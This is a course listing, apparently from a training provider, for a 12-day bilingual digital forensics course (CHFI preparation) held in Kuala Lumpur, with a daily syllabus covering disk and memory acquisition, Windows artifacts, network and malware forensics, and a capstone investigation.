Target audience & prerequisites

Target: Incident responders, junior/mid-level forensic analysts, IT security professionals, law-enforcement cyber units, and anyone preparing for CHFI certification.
Prerequisites:

Basic familiarity with Windows and Linux admin tasks.
Networking fundamentals (TCP/IP, DNS, HTTP).
Comfortable with command line; basic scripting (Python/Bash) recommended but not required.
Participants should bring a laptop capable of running virtualization (8+ GB RAM recommended).

Course length & daily schedule

Total: 12 consecutive training days (recommended 9:00 — 17:00 with 60–90 min lunch + short breaks).
Format: Instructor-led lectures + demos (morning), hands-on labs & casework (afternoon).
Lab access: Cloud/VM lab environment (students connect via VPN) + downloadable forensic images.
Language: All slides, lab guides and handouts will be bilingual (English / Arabic).

High-level learning objectives

By the end of the 12 days participants will be able to:

Follow forensic best practices and legal chain-of-custody procedures.
Acquire images (disk & memory) safely from live and powered-off systems.
Analyze Windows and Linux artifacts (registry, MFT, logs, users, timelines).
Perform memory forensics to detect running malware, injected code and volatile indicators.
Perform network forensics using PCAP analysis and reconstruct sessions.
Produce a professional, legally-defensible forensic report and evidence package.
Use major forensic tools: FTK Imager, Autopsy/Sleuth Kit, Volatility, Wireshark, X-Ways/EnCase concepts.

12-Day Detailed Syllabus (daily agenda + labs)

Day 1 — Introduction & Forensic Fundamentals

Morning: Course intro, CHFI overview, legal/ethical considerations, chain of custody, evidence preservation.
Afternoon Lab: Build lab environment; demonstration: creating forensic images with FTK Imager & dd.
Deliverable: Chain-of-custody template (bilingual).

Day 2 — Forensic Readiness & Acquisition Techniques

Morning: Live vs. dead-box acquisition, imaging formats (E01, raw), hashing, write blockers.
Afternoon Lab: Disk imaging exercises (E01 and raw), verify hashes, use of hardware write blocker.
Deliverable: Imaging checklist.

Day 3 — File Systems & Windows Artifacts I

Morning: NTFS internals, MFT, $LogFile, $UsnJrnl, file slack basics.
Afternoon Lab: Extracting file metadata, recovering deleted files, timeline basics (log2timeline primer).
Deliverable: Timeline fragment for sample case.

Day 4 — Windows Artifacts II (Registry & User Activity)

Morning: Windows registry structure, user profiles, recent files, prefetch, ShimCache, LNK files.
Afternoon Lab: Registry artifact extraction (using Registry Explorer/RegRipper), user activity reconstruction.
Deliverable: User activity report (timeline + artifacts).

Day 5 — Memory Forensics I — Fundamentals & Volatility

Morning: Memory capture methods (FTK, DumpIt), memory anatomy (processes, handles).
Afternoon Lab: Capture live memory; run Volatility to list processes, DLLs, open ports.
Deliverable: Volatility report (process list, suspicious indicators).

Day 6 — Memory Forensics II — Advanced Analysis

Morning: Detecting injected code, rootkits, credential theft, extracting browser/credential artifacts from memory.
Afternoon Lab: Hunt for process injection, extract credentials/artifacts; session hijacking demo.
Deliverable: Memory analysis evidence package.

Day 7 — Network Forensics I — PCAP & Traffic Analysis

Morning: Network capture basics, tools (tcpdump, tshark, Wireshark), reconstructing TCP sessions.
Afternoon Lab: Analyze provided PCAPs, reconstruct HTTP/SMTP/FTP sessions, extract files from PCAP.
Deliverable: Network timeline and extracted evidence.

Day 8 — Network Forensics II — IDS/Proxy Logs & Correlation

Morning: Syslog, proxy logs, IDS alerts correlation, timeline stitching between host & network.
Afternoon Lab: Correlate host artifacts with PCAP and IDS logs; build incident timeline.
Deliverable: Correlated incident timeline.

Day 9 — Malware Forensics & Static/Dynamic Analysis Basics

Morning: Malware taxonomy, safe dynamic analysis environment (sandboxing), static indicators.
Afternoon Lab: Static analysis of a sample binary (strings, PE header), dynamic sandbox run & observe artifacts.
Deliverable: Malware analysis summary & Indicators of Compromise (IOCs).

Day 10 — Mobile & Cloud Forensics (Intro) + Anti-Forensics

Morning: Mobile acquisition concepts, cloud evidence basics (logs, API access), anti-forensics techniques and countermeasures.
Afternoon Lab: Simulated cloud log collection & small mobile artifact lab (emulator images); detect simple anti-forensic traces.
Deliverable: Anti-forensics detection checklist.

Day 11 — Case Building — Full Investigation (Capstone Part 1)

Morning: Assign capstone case (realistic scenario covering acquisition, memory & network). Plan triage and tasks.
Afternoon Lab: Teams perform acquisition, initial analysis, start timeline & evidence collection.
Deliverable: Interim forensic notebook + evidence index.

Day 12 — Case Completion, Reporting & Presentation (Capstone Part 2)

Morning: Complete analysis; finalize timeline, extract IOCs, determine root cause & attacker actions.
Afternoon: Each team presents findings; compile legally-defensible forensic report (executive summary, technical appendices, evidence manifest). Final written exam / practical checklist.
Deliverable: Final forensic report (bilingual template filled), evidence package, presentation.

Labs, Assessments & Grading

Daily labs: Guided + challenge variants; completion tracked with checklist.
Mid-course practical (Day 6): Individual memory forensics mini-task (pass/fail + feedback).
Capstone (Days 11–12): Team-based investigation — graded on technical findings, chain-of-custody, timeline quality, and report clarity.
Final assessment: Practical capstone + short written MCQ covering theory.
Passing criteria: Complete capstone with acceptable findings + pass the written portion (instructor-adjustable).

سجل في هذا الكورس الآن

الوقت و المكان

22/12/2025 - كوالالمبور

التاريخ : 22/12/2025

الفترة : 12 يوم

المكان : كوالالمبور

سجل في الكورس الآن